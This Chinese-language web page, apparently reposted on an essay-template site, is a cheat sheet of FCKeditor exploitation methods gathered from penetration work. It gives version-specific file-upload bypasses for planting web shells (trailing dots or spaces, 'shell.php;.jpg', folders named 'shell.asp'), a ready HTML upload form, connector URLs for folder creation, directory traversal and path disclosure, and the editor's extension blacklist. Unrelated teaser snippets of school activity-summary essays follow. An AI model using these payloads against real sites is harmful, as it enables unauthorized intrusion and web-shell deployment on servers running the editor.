【fckeditor使用方法】Fckeditor漏洞利用总结
【fanwen.jxxyjl.com--活动总结范文】
查看编辑器版本
fckeditor/_whatsnew.html
—————————————————————————————————————————————————————————————
2. version 2.2 版本
apache+linux 环境下在上传文件后面加个.突破!测试通过。
—————————————————————————————————————————————————————————————
3.version <=2.4.2 for php 在处理php 上传的地方并未对media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。
<form id="frmupload" enctype="multipart/form-data"
action="http://www.site.com/fckeditor/editor/filemanager/upload/php/upload.php?type=media" method="post">upload a new file:<br>
<input type="file" name="newfile" size="50"><br>
<input id="btnupload" type="submit" value="upload">
</form>
—————————————————————————————————————————————————————————————
4.fckeditor 文件上传“.”变“_”下划线的绕过方法
很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版fck 的变化。
4.1:提交shell.php+空格绕过
不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。
4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
—————————————————————————————————————————————————————————————
5. 突破建立文件夹
fckeditor/editor/filemanager/connectors/asp/connector.asp?command=createfolder&type=image¤tfolder=%2fshell.asp&newfoldername=z&uuid=1244789975684
fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?command=createfolder¤tfolder=/&type=image&newfoldername=shell.asp
—————————————————————————————————————————————————————————————
6. fckeditor 中test 文件的上传地址
fckeditor/editor/filemanager/browser/default/connectors/test.html
fckeditor/editor/filemanager/upload/test.html
fckeditor/editor/filemanager/connectors/test.html
fckeditor/editor/filemanager/connectors/uploadtest.html
—————————————————————————————————————————————————————————————
7.常用上传地址
fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?command=getfoldersandfiles&type=image¤tfolder=/
fckeditor/editor/filemanager/browser/default/browser.html?type=image&connector=connectors/asp/connector.asp
fckeditor/editor/filemanager/browser/default/browser.html?type=image&connector=http://www.site.com%2ffckeditor%2feditor%2ffilemanager%2fconnectors%2fphp%2fconnector.php (ver:2.6.3 测试通过)
jsp 版:
fckeditor/editor/filemanager/browser/default/browser.html?type=image&connector=connectors/jsp/connector.jsp
注意红色部分修改为fckeditor 实际使用的脚本语言,蓝色部分可以自定义文
件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。
—————————————————————————————————————————————————————————————
8.其他上传地址
fckeditor/_samples/default.html
fckeditor/_samples/asp/sample01.asp
fckeditor/_samples/asp/sample02.asp
fckeditor/_samples/asp/sample03.asp
fckeditor/_samples/asp/sample04.asp
一般很多站点都已删除_samples 目录,可以试试。
fckeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。12
—————————————————————————————————————————————————————————————
9.列目录漏洞也可助找上传地址
version 2.4.1 测试通过
修改currentfolder 参数使用 ../../来进入不同的目录
/browser/default/connectors/aspx/connector.aspx?command=createfolder&type=image¤tfolder=../../..%2f&newfoldername=shell.asp
根据返回的xml 信息可以查看网站所有的目录。
fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?command=getfoldersandfiles&type=image¤tfolder=%2f
也可以直接浏览盘符:
jsp 版本:
fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?command=getfoldersandfiles&type=¤tfolder=%2f
—————————————————————————————————————————————————————————————
10.爆路径漏洞
fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?command=getfoldersandfiles&type=file¤tfolder=/shell.asp
—————————————————————————————————————————————————————————————
11. fckeditor 被动限制策略所导致的过滤不严问题
影响版本: fckeditor x.x <= fckeditor v2.4.3
脆弱描述:
fckeditor v2.4.3 中file 类别默认拒绝上传类型:
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
fckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sfilepath = $sserverdir . $sfilename,而没有使用$sextension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!
而在apache 下,因为"apache 文件名解析缺陷漏洞"也可以利用之,另建议其他上传漏洞中定义type 变量时使用file 类别来上传文件,根据fckeditor 的代码,其限制最为狭隘。
在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用XX 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!
—————————————————————————————————————————————————————————————
12.最古老的漏洞,type文件没有限制!
我接触到的第一个fckeditor漏洞了。版本不详,应该很古老了,因为程序对type=xxx 的类型没有检查。我们可以直接构造上传把type=image 改成type=hsren 这样就可以建立一个叫hsren的文件夹,一个新类型,没有任何限制,可以上传任意脚本!
—————————————————————————————————————————————————————————————
以上方法都是网上收集和在平时渗透中所总结的经验,可能有些有遗漏,当再想起的时候再补充,也有自己没发现的就要靠各位大侠分享学习了!
12本文来源:https://fanwen.jxxyjl.com/huodongzongjiefanwen/38809.html
-
幼儿园清明节祭英烈主题活动|清明节祭英烈的主题活动总结详细阅读
清明节祭英烈的主题活动总结篇一 学院团委积极组织广大青年团员深入开展了以清明祭英烈·共铸中华魂为主题的系列活动。现将活动总结如下: 一、慎终追远,铭记历史。 学院团委广播站通过播报革命故事、革命英雄事迹来缅怀革命先烈,号召广大青年学生深入学习革命历史,引导青年学生继承先烈遗志、珍惜幸福...
-
[青年志愿者实践活动总结]青年志愿者的优秀活动总结模板详细阅读
青年志愿者的活动总结模板篇一 青年志愿者活动是倡导团结友爱、助人为乐、见义勇为的社会风气,是当代社会注意一项十分高尚的事业。体现了中华民族助人为乐、扶贫济困的传统美德,是大有期望的事业。努力做好这项事业,有利于全社会树立奉献、友爱、互助、提高的时代新风范。这是当代大学生的行动指南,是当代青年志...
-
【学校爱国卫生月活动总结】爱国卫生月的活动总结模板详细阅读
【篇一】 20xx年x月是全国第x个爱国卫生月,今年的活动主题是“历史与展望——为了人民的健康”。x月7日,江油市在太白公园广场举行“爱国卫生运动x周年纪念暨全国第x个爱国卫生月宣传活动启动仪式”,市爱卫会副主任、人民政府办公室党组成员刘年高、市卫生计生局局长代勇参加启动仪式并致辞,市爱卫会各...
-
支教活动的总结感悟_关于支教活动的总结范文详细阅读
关于支教活动的总结范文篇一 转眼间支教工作已接近尾声,这十八天的支教经历已经在我的人生道路上写下了不平凡的一页。十八天的酸、甜、苦、辣,早已深深地印在了我的心里。十八天,对于我和那里的孩子来说,太短了,实在是太短了,还没有来得及回味就已经踏上了返程的火车。这十八天,在给孩子们留下美好回忆的同时...
-
【大力推广普通话的弊端】大力推广普通话的活动总结详细阅读
推广普通话的活动总结篇一 为搞好这每年一次的大型推普周宣传活动,江油市政府和市教体局、市语委高度重视,认真组织社会各界积极参与,取得了良好的社会效果。现将我市开展第十二届全国推广普通话宣传周活动的主要工作总结如下: 一、领导重视,安排得当 按照本届推普周的指导思想和宣传主题:热爱祖国语言...
-
【开展生命教育的活动总结】开展诚信教育的活动总结详细阅读
开展诚信教育的活动总结篇一 本着进一步加强我校大学生诚信教育、提升诚信意识、树立诚信之风尚、建设诚信校园的精神,我班认真开展以“诚实守信”为主题的班会活动,以引导同学以诚待人,以信立身。现对此次班会总结如下: 一、活动目的 1 本次班会是让同学们懂得“诚信”教育的重要性,做事应该从大处着眼...
-
学校知识产权宣传周活动总结_全国知识产权宣传周活动总结详细阅读
【篇一】 近日物流仓储部开展了以“加强知识产权保护运用,加快知识产权强国建设。”为主题的知识产权宣传周活动,设立世界知识产权日旨在全世界范围内树立尊重知识,崇尚科学和保护知识产权的意识,营造鼓励知识创新和保护知识产权的法律环境。为了宣传知识产权知识,增强物流仓储部职工对知识产权的了解,根据红钢...
-
传承民族精神_民族精神月的活动总结详细阅读
民族精神月的活动总结篇一 我校在青年学生中大力弘扬和培育民族精神,以爱国主义教育为核心,将弘扬民族精神的教育由浅入深、坚持不懈地贯穿到学校教育的全过程,教育青年学生增强民族自尊心和民族自豪感,进而树立为祖国为人民奋斗的远大理想。现对一段时间以来,我校弘扬和培育民族精神活动情况总结如下: 一、...
-
【小学课外活动总结范文】实施课外活动的总结范文详细阅读
实施课外活动的总结范文篇一 当前,课外活动越来越被众多的学校与教师所重视,因为实践证明,课外活动是实施全面素质教育的重要途径。作为中学教师,对于在课外活动中加强学生的素质教育,本人主要突破了以下几方面工作: 一、进一步提高自身对课外活动重要性的认识 过去一些学校的领导、教师对课外活动的意义...
-
[公司春游活动总结范文]参加春游的活动总结范文详细阅读
参加春游的活动总结篇一 阳光志愿者协会成功举行了阳光春游活动。参与这次活动总共有31位阳光志愿者协会的成员,他们分别来自数信系、政法系、音乐系、物电系、生物系、旅馆系、教育系,不同的系别带来了不一样的性格和不同的特色,这也为出游增添了不少的乐趣。大家满怀着无限的欣喜与热情,积极参与到活动中,团...